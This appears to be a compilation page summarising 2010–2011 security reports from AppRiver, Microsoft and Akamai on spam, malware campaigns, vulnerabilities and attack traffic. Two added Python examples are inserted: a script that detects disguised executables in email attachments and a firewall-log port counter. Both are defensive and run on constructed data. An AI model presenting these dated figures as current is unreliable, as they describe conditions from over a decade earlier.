This chart represents both total and spam traffic throughout the month of May. Spam traffic remained level this month, totaling 2.95 billion messages.

Regions of Origin
This graph represents both spam and malicious email traffic by region. Spam output from Asia increased in May. We also saw a slight increase in spam output from Australia and Oceania.

Top Ten Countries of Origin
This chart represents the top countries from which spam originated during May. For the second consecutive month, Russia held the top spot as the number one country for spam origination. Also, Brazil’s output surpassed the US for the first time in many months.

Top Email-Delivered Viral Threats
These are the top 20 malware threats we saw last month in order of frequency, with the most frequent appearing in the top position. The virus names that begin with “X.” signify rules that were written by AppRiver Analysts.

30 Day Virus Activity
This chart represents email-borne virus and malware activity during the month of May as seen by AppRiver filters. For the fifth straight month we saw email-borne virus messages more than double in quantity. In May, we quarantined more than 102 million email-borne virus messages, an increase of 239% over April 2011. In fact, May 1st 2011 was the largest volume of these messages that we have seen in a single day in nearly two years.

Image Spam
The chart below represents total Image spam seen by AppRiver filters during May. The obfuscation tactic of using image attachments in an attempt to deliver spam content decreased slightly this month.

You Are Under Surveillance
In the beginning of May, we noticed an interesting malware campaign that had begun early in the morning of May 3rd. The emails claimed to have come from the FBI and delivered a warning that, even though the sender evidently did not know who the recipient was, the FBI was busy monitoring the recipient's Internet activities. The email explained that the recipient's IP address had been logged at more than 40 illegal websites and asked the reader to fill out the attached "questionnaire". The attachment was named document.zip, and although the file inside the zip was an executable (.exe), it carried a .pdf icon. The file was not a questionnaire, but a malicious downloader from the Bredolab family.

Zeus Poses as Fake Microsoft Security Update
May 10th was patch Tuesday and in addition to the real thing, cybercriminals had their own "security" offering. Messages circulated, claiming to be a security update from Microsoft. Such messages began on May 6th and continued to hit our filters with regularity until one week later.
The messages were spoofed to appear from Microsoft and had the subject “URGENT: Critical Security Update”. Messages professed to contain a “Security Update for Microsoft Windows OS”. Ironically, the email states that the update will prevent malicious users from gaining access to your computer files, when in reality it would do just the opposite. The attachment was in fact another variant of the Zeus Trojan.
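Both campaigns above share the same delivery pattern: a spoofed sender and a zip attachment whose member is a Windows executable dressed up as a document or an update. The following is an added example (it is not AppRiver's code and is not taken from the report) of a mail-gateway triage routine that opens the zip without executing anything, checks the member's real content against the `MZ` magic that every PE executable starts with, flags executable and double extensions, and flags a claimed microsoft.com sender on a message that carries an attachment, since Microsoft does not distribute security updates as e-mail attachments. The messages and zip archives it inspects are constructed inline as stand-ins for the campaigns; the domains, file names and `FAKE_PE` stub are illustrative assumptions.

```python
import io
import zipfile
from email import message_from_bytes, policy
from email.message import EmailMessage
from email.utils import parseaddr

PE_MAGIC = b"MZ"  # DOS header that every Windows PE executable starts with, whatever its icon or name
EXEC_EXTS = {".exe", ".scr", ".com", ".pif", ".bat", ".cmd", ".js", ".vbs"}
DOC_EXTS = {".pdf", ".doc", ".docx", ".xls", ".txt"}


def extension_chain(name):
    """'dir/questionnaire.pdf.exe' -> ['.pdf', '.exe'] (lower-cased)."""
    base = name.rsplit("/", 1)[-1].lower()
    return ["." + p for p in base.split(".")[1:]]


def inspect_zip(zip_bytes):
    """Return [(member_name, [reasons])] for members that look like (disguised) executables."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            with zf.open(info) as fh:
                head = fh.read(2)  # only the magic bytes are needed; the member is never run
            exts = extension_chain(info.filename)
            last = exts[-1] if exts else ""
            reasons = []
            if head == PE_MAGIC:
                reasons.append("PE executable content")
                if last in DOC_EXTS:
                    reasons.append("PE content disguised as " + last)
            if last in EXEC_EXTS:
                reasons.append("executable extension " + last)
            if len(exts) > 1:
                reasons.append("double extension " + "".join(exts))
            if reasons:
                findings.append((info.filename, reasons))
    return findings


def triage_message(raw):
    """Parse an RFC 5322 message and return a list of human-readable alerts."""
    msg = message_from_bytes(raw, policy=policy.default)
    alerts = []
    _, sender = parseaddr(msg.get("From", ""))
    sender_domain = sender.rsplit("@", 1)[-1].lower()
    attachments = list(msg.iter_attachments())
    # The From header is trivially spoofable; a Microsoft sender plus an attachment is a red flag.
    if sender_domain.endswith("microsoft.com") and attachments:
        alerts.append("From claims %s but Microsoft does not ship updates as mail attachments" % sender_domain)
    for part in attachments:
        name = part.get_filename() or ""
        data = part.get_payload(decode=True) or b""
        if name.lower().endswith(".zip") or part.get_content_type() == "application/zip":
            for member, reasons in inspect_zip(data):
                alerts.append("%s -> %s: %s" % (name, member, "; ".join(reasons)))
        elif data[:2] == PE_MAGIC:
            alerts.append("%s: bare PE executable attached" % name)
    return alerts


# --- constructed sample data (not real samples from the campaigns) ---
FAKE_PE = PE_MAGIC + b"\x00" * 62  # DOS-header stub only; not a runnable binary


def build_zip(members):
    """In-memory zip archive; members is {name: bytes}."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, data in members.items():
            zf.writestr(name, data)
    return buf.getvalue()


def build_sample_message(sender, subject, zip_name, members):
    """A lookalike of the lures above: spoofed sender, a zip attachment holding an executable."""
    msg = EmailMessage()
    msg["From"] = sender
    msg["To"] = "victim@example.com"
    msg["Subject"] = subject
    msg.set_content("Please open the attached file.")
    msg.add_attachment(build_zip(members), maintype="application", subtype="zip", filename=zip_name)
    return msg.as_bytes()


if __name__ == "__main__":
    raw = build_sample_message("FBI Cyber Division <noreply@fbi.gov>", "You are under surveillance",
                               "document.zip", {"questionnaire.exe": FAKE_PE})
    for alert in triage_message(raw):
        print(alert)
```

The content check matters more than the name check: renaming the member to `report.pdf` still trips the `MZ` test, which is the case the icon trick is designed to get past a human reader. In production the sender check should be driven by SPF/DKIM/DMARC results rather than the bare From header.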

AppRiver, Threat and Spamscape Report, June 2011

1 Tir 1390 | Tags: Analytical reports
Microsoft Security Report, Second Half of 2010
Volume 10 of the Microsoft Security Intelligence Report (SIRv10) provides in-depth perspectives on software vulnerabilities, software vulnerability exploits, malicious and potentially unwanted software, and security breaches in both Microsoft and third party software. Microsoft developed these perspectives based on detailed trend analysis over the past several years, with a focus on 2010.
Vulnerability Severity
The following figure shows Industry-wide vulnerability disclosures by severity, since 2006.

Although the number of Medium and High severity vulnerabilities disclosed is routinely much greater than the number of Low severity vulnerability disclosures, the trend in 2010 is a positive one, with Medium and High disclosures declining by 17.5 percent and 20.2 percent from 2009, respectively. Low severity vulnerability disclosures increased 45.8 percent, from 190 in 2009 to 277 in 2010.
Vulnerability Complexity
Some vulnerabilities are easier to exploit than others, and vulnerability complexity is an important factor to consider in determining the magnitude of the threat that a vulnerability poses. A High severity vulnerability that can only be exploited under very specific and rare circumstances might require less immediate attention than a lower severity vulnerability that can be exploited more easily.
The following figure shows the complexity mix for vulnerabilities disclosed each year since 2006. Note that Low complexity indicates greater danger, just as High severity indicates greater danger in the previous figure.

As with vulnerability severity, the trend here is a positive one, with Low and Medium complexity vulnerability disclosures declining 28.3 percent and 5.0 percent from 2009, respectively. High complexity vulnerability disclosures increased 43.3 percent, from 120 in 2009 to 172 in 2010.
Operating System, Browser, and Application Vulnerabilities
The following figure shows industry-wide vulnerabilities for operating systems, browsers, and applications since 2006.
Application vulnerabilities continued to account for a large majority of all vulnerabilities in 2010, although the total number of application vulnerabilities declined 22.2 percent from 2009. Operating system and browser vulnerabilities remained relatively stable by comparison, with each type accounting for a small fraction of the total.

Vulnerability Disclosures
The following figure charts vulnerability disclosures for Microsoft and non-Microsoft products since 2006.

Vulnerability disclosures across the industry were down 16.5 percent in 2010 from 2009.
Vulnerability disclosures for Microsoft products increased slightly in 2010 but have generally remained stable over the past several periods. Vulnerabilities in Microsoft products accounted for 7.2 percent of all vulnerabilities disclosed in 2010.
The following figure shows the prevalence of different types of exploits for each quarter in 2010.

In 3Q10, the number of Java attacks increased to fourteen times the number of attacks recorded in 2Q10, driven mostly by the exploitation of a pair of vulnerabilities in versions of the Sun (now Oracle) JVM. Together, these two vulnerabilities accounted for 85 percent of the Java exploits detected in the second half of 2010.
Exploits that target document editors and readers, such as Microsoft® Word and Adobe Reader, declined in 2Q10 and remained at a lower level thereafter.
Security Breach Trends
The following figure shows security breach incidents by incident type from 3Q09 to 4Q10.
Malicious incidents (those involving “hacking” incidents, malware, and fraud) routinely account for less than half as many incidents as negligence (involving lost, stolen, or missing equipment; accidental disclosure; or improper disposal).
Malware and Potentially Unwanted Software
The information in this section was compiled from telemetry data that was generated from more than 600 million computers worldwide.
Global Infection Rates
The following table shows the locations with the most computers reporting detections and removals by Microsoft desktop antimalware products in 2010.
Detections in Korea rose 56.8 percent from 3Q10 to 4Q10. Detections in Russia rose 41.3 percent from 3Q to 4Q, primarily because of a significant increase in the number of computers running Microsoft Security Essentials there.
In absolute terms, the locations with the most computers reporting detections tend to be ones with large populations and large numbers of computers.
Operating System Infection Rates
The following figure shows the infection rate for each Windows operating system/service pack combination that accounted for at least 0.1 percent of total MSRT executions in 2010.
This data is normalized: the infection rate for each version of Windows is calculated by comparing an equal number of computers per version (for example, 1,000 Windows XP SP2 computers to 1,000 Windows 7 RTM computers).
As in previous periods, infection rates for more recently released operating systems and service packs are consistently lower than earlier ones, for both client and server platforms. Windows 7 and Windows Server 2008 R2, the most recently released Windows client and server versions, respectively, have the lowest infection rates on the chart.
Infection rates for the 64-bit versions of Windows Vista® and Windows 7 are lower than for the corresponding 32-bit versions of those operating systems.

Threat Categories
The Microsoft Malware Protection Center (MMPC) classifies individual threats into types based on a number of factors, including how the threat spreads and what it is designed to do. To simplify the presentation of this information and make it easier to understand, these types are grouped into 10 categories based on similarities in function and purpose.
The following figure shows detections by threat category each quarter in 2010, by percentage of all computers reporting detections.

Totals for each time period may exceed 100 percent because some computers have more than one category of threat detected and removed from them in each time period.
The miscellaneous trojans category, which consists of all trojans that are not categorized as trojan downloaders & droppers, was the most prevalent category each quarter in 2010, with detections on 20.0 percent of all infected computers in 4Q10, down from 22.7 percent in 1Q10.
Rogue Security Software (Scareware)
Rogue security software is software that appears to be beneficial from a security perspective but provides limited or no security, generates erroneous or misleading alerts, or attempts to lure users into participating in fraudulent transactions.
The following figure shows detection trends for the most common rogue security software families detected in 2010.

Email Threats
Spam Messages Blocked
The information in this section is compiled from telemetry data provided by Microsoft Forefront Online Protection for Exchange (FOPE), which provides spam, phishing, and malware filtering services for thousands of enterprise customers and tens of billions of messages per month.
The following figure shows messages blocked by FOPE each month in 2010.

After increasing gradually and then reaching a plateau through the first eight months of 2010, the number of spam messages received and blocked by FOPE dropped abruptly in September, and again in December. These drops can be correlated with events involving two of the world’s most significant spam-sending botnets: During the last week of August, researchers affiliated with the security firm LastLine spearheaded a coordinated takedown of command-and-control (C&C) servers associated with the Cutwail spambot. Also around December 25, spam researchers around the world recorded an almost complete cessation of spam originating from the large Rustock botnet. The botnet subsequently began sending spam again in mid-January.
Spam Types
The FOPE content filters recognize several different common types of spam messages. The following figure shows the relative prevalence of these spam types in 2010.

Advertisements for nonsexual pharmaceutical products accounted for 32.4 percent of the spam messages blocked by FOPE content filters in 2010. Together with nonpharmaceutical product ads (18.3 percent of the total) and advertisements for sexual performance products (3.3 percent), product advertisements accounted for 54.0 percent of spam in 2010.
In an effort to evade content filters, spammers often send messages that consist only of one or more images, with no text in the body of the message. Image-only spam messages accounted for 8.7 percent of the total in 2010.
1 Khordad 1390 | Tags: Analytical reports
The State of the Internet, 4th Quarter of 2010
Date: 26/02/90 (Iranian calendar)
Each quarter, Akamai Technologies publishes its "State of the Internet" report. Akamai's globally distributed network of servers allows it to gather massive amounts of information on many metrics, including connection speeds, attack traffic, and network connectivity, availability and latency problems, as well as traffic patterns on leading Web sites. This report includes data gathered from across Akamai's global server network during the fourth quarter of 2010 about attack traffic, broadband adoption, and mobile connectivity, as well as trends seen in this data over time.
Attack Traffic, Top Originating Countries
During the fourth quarter of 2010, Akamai observed attack traffic originating from 207 unique countries/regions, down just two from the third quarter. While the list of countries/regions comprising the top five remained constant from quarter-to-quarter, a shift in the rankings clearly occurred, as shown in the chart. Most notably, the United States dropped to fifth place globally, the source of 7.3% of the observed attack traffic. Russia shifted into first place, responsible for approximately 12% more of the observed traffic in the fourth quarter than in the prior quarter. For most of the remaining countries, the quarterly changes in attack traffic percentages were mixed, though none of the variations were significant.

Attack Traffic, Top Ports
Attack traffic concentration among the top 10 targeted ports dropped significantly from the third quarter, with the top 10 ports responsible for just 72% of the observed attacks (down from 87% in the third quarter of 2010). This difference is mostly accounted for by the continued decline in the percentage of attacks targeted at Port 445 (Microsoft-DS), down from 56% to 47%, and Port 23 (Telnet), down from 17% to 11%, as shown in the chart.

Internet Penetration
As shown in the figure below, the top 10 countries remained the same quarter over quarter. Nine of the top 10 countries saw quarterly growth in the number of unique IP addresses observed by Akamai, ranging from an increase of under 1% in France to an 18% increase in South Korea. Yearly growth across all of the top 10 countries was strong, with double digit yearly increases seen in all countries but France. China's growth rate has been consistently strong throughout 2010, with year-over-year changes of 30% or more seen in all quarters. Concentration among the top 10 remained consistent with the past several quarters, accounting for nearly 70% of the observed IP addresses. In looking at the "long tail," there were 183 countries/regions with fewer than one million unique IP addresses connecting to Akamai in the fourth quarter of 2010, 132 with fewer than 100,000 unique IP addresses, and 30 with fewer than 1,000 unique IP addresses. The counts for all three thresholds were down quarter-over-quarter.
Global Average Connection Speeds
In the fourth quarter of 2010, the global average connection speed remained essentially flat as compared to the third quarter, ending the year approximately 60 Kbps shy of the 2 Mbps “broadband” threshold. However, as shown in Figure 5, average connection speeds among the top 10 countries were not as static, with quarterly growth as high as 14% (in Belgium), though declines were not as significant, with South Korea’s 3.0% quarterly decline the worst of the three countries in the list that lost ground. Even with these declines, all of the countries within the top 10, as well as the United States, maintained average connection speeds that exceeded the “high broadband” threshold of 5 Mbps.
Attack Traffic From Mobile Networks, Top Originating Countries
In looking at attack traffic from known mobile network providers observed by Akamai during the fourth quarter of 2010, we see that the list of top countries responsible for the attacks remained fairly consistent quarter-over-quarter.
Nine of the top 10 countries, as shown in Figure 19, are the same as in the third quarter – Brazil dropped out of the top 10 list, while Hungary joined it. Italy remained the source of the largest amount of observed attack traffic, up nearly 7% from the third quarter. Of the top 10 countries, the United Kingdom was the only country that saw their percentage drop quarter-over-quarter. Overall attack traffic concentration remained fairly consistent from the prior quarter, with the top two countries responsible for 40% of observed attacks, while the top 10 countries were the source of three-quarters of observed attacks.

Attack Traffic From Mobile Networks, Top Ports
In the fourth quarter of 2010, nine of the top 10 ports targeted by attack traffic coming from mobile networks were the same as in the third quarter. The lone difference was the appearance of Port 3389 (Microsoft Terminal Services), which replaced Port 6882 (BitTorrent) at the bottom of the list. (And in the third quarter, BitTorrent itself replaced Symantec System Center at the bottom of the list.) As shown in Figure 20, attack concentration grew very slightly in the fourth quarter, with Port 445 responsible for 76% of observed attacks (up from 75% last quarter), and the top 10 ports accounting for almost 96% of observed attacks (up just over 1% from last quarter).
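The "top ports" figures in both the fixed-network and mobile-network sections above are the same metric: the share of observed attack events per destination port, and the fraction of all events that the top N ports account for. The following is an added example, not Akamai's code, that computes that metric from perimeter firewall drop logs so a team can produce the same view for its own network. The log lines are constructed iptables-style records (the addresses are documentation ranges), and the `SERVICE_NAMES` table only covers the ports the report names plus a few common ones; both are assumptions for the example.

```python
import re
from collections import Counter

# Constructed sample of inbound DROP events, in the format netfilter's LOG target writes to syslog.
# One unrelated sshd line is included to show that non-matching records are skipped.
SAMPLE_LOG = """\
Oct  3 10:01:12 fw kernel: DROP IN=eth0 SRC=203.0.113.5 DST=198.51.100.7 PROTO=TCP SPT=51234 DPT=445
Oct  3 10:01:13 fw kernel: DROP IN=eth0 SRC=203.0.113.9 DST=198.51.100.7 PROTO=TCP SPT=40122 DPT=445
Oct  3 10:01:15 fw kernel: DROP IN=eth0 SRC=192.0.2.44 DST=198.51.100.7 PROTO=TCP SPT=33001 DPT=23
Oct  3 10:01:17 fw kernel: DROP IN=eth0 SRC=203.0.113.77 DST=198.51.100.7 PROTO=TCP SPT=51235 DPT=445
Oct  3 10:01:18 fw sshd[2210]: Accepted publickey for admin from 198.51.100.2 port 50110 ssh2
Oct  3 10:01:19 fw kernel: DROP IN=eth0 SRC=192.0.2.45 DST=198.51.100.7 PROTO=TCP SPT=33002 DPT=23
Oct  3 10:01:20 fw kernel: DROP IN=eth0 SRC=203.0.113.80 DST=198.51.100.7 PROTO=TCP SPT=51236 DPT=445
Oct  3 10:01:22 fw kernel: DROP IN=eth0 SRC=192.0.2.46 DST=198.51.100.7 PROTO=TCP SPT=33003 DPT=3389
Oct  3 10:01:23 fw kernel: DROP IN=eth0 SRC=203.0.113.81 DST=198.51.100.7 PROTO=TCP SPT=51237 DPT=445
Oct  3 10:01:25 fw kernel: DROP IN=eth0 SRC=192.0.2.47 DST=198.51.100.7 PROTO=TCP SPT=33004 DPT=22
Oct  3 10:01:26 fw kernel: DROP IN=eth0 SRC=192.0.2.48 DST=198.51.100.7 PROTO=TCP SPT=33005 DPT=1433
"""

# Only DROP records with a destination port count as attack events.
DROP_RE = re.compile(r"\bDROP\b.*\bDPT=(\d+)\b")

# Service labels for the ports discussed in the report plus a few common targets (assumed table).
SERVICE_NAMES = {
    445: "Microsoft-DS",
    23: "Telnet",
    3389: "Microsoft Terminal Services",
    22: "SSH",
    80: "HTTP",
    1433: "MS-SQL",
    6882: "BitTorrent",
}


def port_counts(log_text):
    """Count attack events per destination port."""
    counts = Counter()
    for line in log_text.splitlines():
        m = DROP_RE.search(line)
        if m:
            counts[int(m.group(1))] += 1
    return counts


def port_concentration(counts, top_n=10):
    """Return (ranked, top_share): ranked = [(port, service, pct_of_all_events)] for the top N
    ports, top_share = percentage of all events that hit those N ports (the report's
    "attack concentration" figure)."""
    total = sum(counts.values())
    if total == 0:
        return [], 0.0
    top = counts.most_common(top_n)
    ranked = [(port, SERVICE_NAMES.get(port, "unknown"), round(100.0 * n / total, 1)) for port, n in top]
    top_share = round(100.0 * sum(n for _, n in top) / total, 1)
    return ranked, top_share


if __name__ == "__main__":
    ranked, share = port_concentration(port_counts(SAMPLE_LOG), top_n=3)
    for port, service, pct in ranked:
        print("%5d  %-28s %5.1f%%" % (port, service, pct))
    print("top 3 ports account for %.1f%% of observed attacks" % share)
```

Computing the same figures for consecutive quarters and diffing the per-port shares reproduces the quarter-over-quarter comparison the report makes; a port whose share jumps between quarters (Port 3389 appearing in the mobile list above) is usually worth a look at the source addresses behind it.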
The State of the Internet, 4th Quarter, 2010 Report (Akamai_state_of_internet_q42010.pdf)
27 Ordibehesht 1390 | Tags: Analytical reports